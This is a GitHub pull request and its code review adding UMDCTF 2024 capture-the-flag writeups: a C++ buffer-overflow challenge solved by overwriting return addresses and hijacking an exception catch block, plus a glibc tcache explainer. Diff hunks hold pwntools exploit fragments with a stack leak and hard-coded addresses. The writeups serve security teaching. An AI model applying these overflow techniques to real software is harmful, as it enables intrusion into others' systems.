### PR TITLE
feat(umdctf24): add sunbather writeups

### LINKED ISSUE #124: FEAT: Add UMDCTF Writeups
If you want to add any, please do.
@MxHonesty @Stefan2320 @bogdan-stelea @MettleSphee

### PR DESCRIPTION
**Pull request by Costinteo**
Closes #124 

you can add your writeups to this branch and push to this PR. but PLEASE do not rebase and recommit everything :) commit history looks like shit if you do that

### CODE REVIEW

**Comment by Costinteo** [comment]
@MxHonesty @Stefan2320 are you planning to add any writeups here?

**Comment by Stefan2320** [comment]
Yes, I have two writeups already finished (ready-aim-fire and the voice) and next week I hope I can do worm-eat-worm and I'll add everything then.

File: content/umdctf_2024/ready_aim_fire.md [hunk 1]
```diff
@@ -0,0 +1,161 @@
...
+        fire_weapon();
+        cout << "Looks like you missed your opportunity to fire." << endl;
+    }
+    catch (exception e) {
+        cout << "Seems like you missed." << endl;
+    }
+}
+```
+
+We can see that there is a constraint though, if we do a BOF, it will trigger an exception, which will be caught in the main function. Additionally, I noticed an extra function called 'direct_hit,' which suggested that we should attempt to redirect the exception thrown during a BOF into the catch block of 'direct_hit()' to print the flag (the intended solution). Unfortunately, my implementation didn't work as expected. Therefore, my next idea was to overwrite the return address of the main function with the address of 'print_flag()' after the exception was triggered
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:83]: dot "." at the end of the paragraph

**Review by Stefan-Radu — CHANGES_REQUESTED** [review]
I think there are some paragraphs in the ready-aim-fire wu that could be made more clear, since I found it a bit hard to follow. I'm a bit short on time, so I'll be back a bit later / tomorrow to clarify exactly what I mean. pls ping if I forget

File: content/umdctf_2024/ready_aim_fire.md (hunk 1 above)
Comment (Stefan-Radu) [reply content/umdctf_2024/ready_aim_fire.md:83]: I didn't manage to check the tcache post, but will do

File: content/umdctf_2024/ready_aim_fire.md [hunk 2]
```diff
@@ -0,0 +1,161 @@
...
+
+payload += stack_leak 
+
+payload += og_main   
+payload += b"0000"+print_flag 
+target.sendline(payload)
+target.interactive()
+```
+
+Although I like this solution the intented one is more elegant.
```
Comment (Costinteo) [inline content/umdctf_2024/ready_aim_fire.md:140]: ``intented`` --> ``intended``

File: content/umdctf_2024/ready_aim_fire.md [hunk 3]
```diff
@@ -0,0 +1,161 @@
...
+
+void fire_weapon() {
+    Cannon w;
+    w.fire();
+}
+
+int main() {
+    int target_assist;
+    cout << "Quick! While the spice harvester's shields are down! Fire the laser cannon!" << endl;
+    cout << &target_assist << endl;
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:71]: comment maybe smth like // <--- stack leak

File: content/umdctf_2024/ready_aim_fire.md [hunk 4]
```diff
@@ -0,0 +1,161 @@
...
+    Cannon(): bufIndex(0) {}
+
+    void fire() {
+        char c ;
+        for (;;) {
+            cin.get(c);
+            if (c == '\n') {
+                break;
+            } else {
+                buf[bufIndex++] = c;
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:54]: comment maybe smth like // <--- bof here

File: content/umdctf_2024/ready_aim_fire.md [hunk 5]
```diff
@@ -0,0 +1,161 @@
...
+}
+```
+
+We can see that there is a constraint though, if we do a BOF, it will trigger an exception, which will be caught in the main function. Additionally, I noticed an extra function called 'direct_hit,' which suggested that we should attempt to redirect the exception thrown during a BOF into the catch block of 'direct_hit()' to print the flag (the intended solution). Unfortunately, my implementation didn't work as expected. Therefore, my next idea was to overwrite the return address of the main function with the address of 'print_flag()' after the exception was triggered
+
+### Solution
+
+#### Unintented
+
+When first trying to do the BOF the program crashed in the exception handler and we could clearly see that we had overwritten there something.
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:89]: To me it seems like you tend to have sentences on the longer(ish) side, which makes everything harder to read imo. For example here I would rephrase like:

When first trying to do the BOF the program crashed in the exception handler. We could clearly see that we had overwritten something there.

This change would also give you a bit more space to provide extra details: 
* BOF with what input?
* _could clearly see_ -- q: what where? | a: GDB i guess? 
* _overwritten something_ -- what is something?

File: content/umdctf_2024/ready_aim_fire.md [hunk 6]
```diff
@@ -0,0 +1,161 @@
...
+target  .recvuntil(b"Fire the laser cannon!")
+recvline =  target.recvline()
+stack_leak =  target.recvline()
+stack_leak = p64((int(stack_leak.decode(),16))-0x10)
+payload += stack_leak 
+payload += p64(0x402547) # catch from direct_hit
+target.sendline(payload)
+```
+
+Some other interesting things about the exception handler is that it works stack frame by stack frame, when an exception is thrown the current RIP searches in the .eh_frame section if it's in a catch block in that function. If it's found then it will jump to the catch block otherwise it will unwind the stack to clean it. After this it uses the stored return address to repeat this process on the next stack frame and comparing it to the .eh_frame table. The process goes on until either the exception is caught or it reaches the base exception handler.
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:156]: stack fram by stack frame. When an ex...

File: content/umdctf_2024/ready_aim_fire.md [hunk 7]
```diff
@@ -0,0 +1,161 @@
...
+●→   0x402849 <std::exception::exception(std::exception const&)+27> mov    QWORD PTR [rax], rdx
+     0x40284c <std::exception::exception(std::exception const&)+30> nop    
+     0x40284d <std::exception::exception(std::exception const&)+31> pop    rbp
+     0x40284e <std::exception::exception(std::exception const&)+32> ret    
+     0x40284f                  nop    
+     0x402850 <Cannon::Cannon()+0> endbr64 
+
+```
+
+To address this issue, I extended my payload beyond the stack leak address by applying an offset to ensure it wouldn't interfere with the existing code. Then I continued with the address found on the stack ensuring that the exception would execute smoothly and return to the main function.
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:113]: here I don't fully understand what _extending beyond the stack leak_ and what _applying an offset_ mean. might be a skill issue tho lol

File: content/umdctf_2024/tcache.md [hunk 8]
```diff
@@ -0,0 +1,241 @@
...
+date: 2024-04-17T14:23:28+03:00
+description: Information about tcache 
+author: PineBel
+tags:
+    - pwn
+
+----
+## Tcache
+
+Tcache (per thread cache) was added in glibc 2.26 to make heap allocation more efficient, and basically each thread will get it s own bin of small chunks.
```
Comment (Stefan-Radu) [inline content/umdctf_2024/tcache.md:12]: its*
long sentence: more efficient. Each thread ...
also what does _own bin of small chunks_ mean?

File: content/umdctf_2024/tcache.md [hunk 9]
```diff
@@ -0,0 +1,241 @@
...
+- Each bin only has an `fd` pointer.
+- Allocating from a tcache bin takes priority over every other bin.
+- When `free` is called or `malloc` is invoked, this is the lifecycle (which bins will be used):
+  - Initially checks tcache. If full or the size exceeds limits, looks in fastbins. If conditions are met, searches in unsorted bins, then small or large bins.
+  - For `malloc` only, if no suitable bin is found, it tries obtaining memory from the top chunk. If that fails, it extends the heap. If both attempts fail, it returns null.
+
+<br>
+
+## Tcache Structure
+To understand better how the tcache works, I played a bit around with [shellphishes](https://github.com/shellphish/how2heap) GitHub project. <br>
```
Comment (Stefan-Radu) [inline content/umdctf_2024/tcache.md:28]: you can actually just use two spaces to force a newline in markdown, like <space><space> at the end of the line

**Comment by Stefan-Radu** [comment]
the tcache post is really cool! will probably have to be moved in the `blog` section when there'll be one?

**Comment by Costinteo** [comment]
@Stefan-Radu check Belgi's changes and merge if okay

File: content/umdctf_2024/ready_aim_fire.md [hunk 10]
```diff
@@ -80,16 +80,20 @@ int main() {
...
 
-#### Unintented
+#### Unintended
 
-When first trying to do the BOF the program crashed in the exception handler and we could clearly see that we had overwritten there something.
+When first trying to do the BOF with an input of length 33 the program crashed in the exception handler and printed "Seems like you missed.". 
+If we give an input longer than 44 we will start overwriting the RBP and the program will crash. 
+This happens because we don't return in a 'normal' way to main but through exception throwing.
+
+We can see in the image below that the RBP value is used in the exception handler, which is called when the bufferIndex is greater than 32 (input: "A"*44 + "X"*8).
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:94]: this is a lot more clear now

File: content/umdctf_2024/ready_aim_fire.md [hunk 11]
```diff
@@ -80,16 +80,20 @@ int main() {
...
```
Comment (Stefan-Radu) [inline content/umdctf_2024/ready_aim_fire.md:93]: this is a lot more clear now

**Review by Stefan-Radu — APPROVED** [review]
it's a lot more clear now. good job!
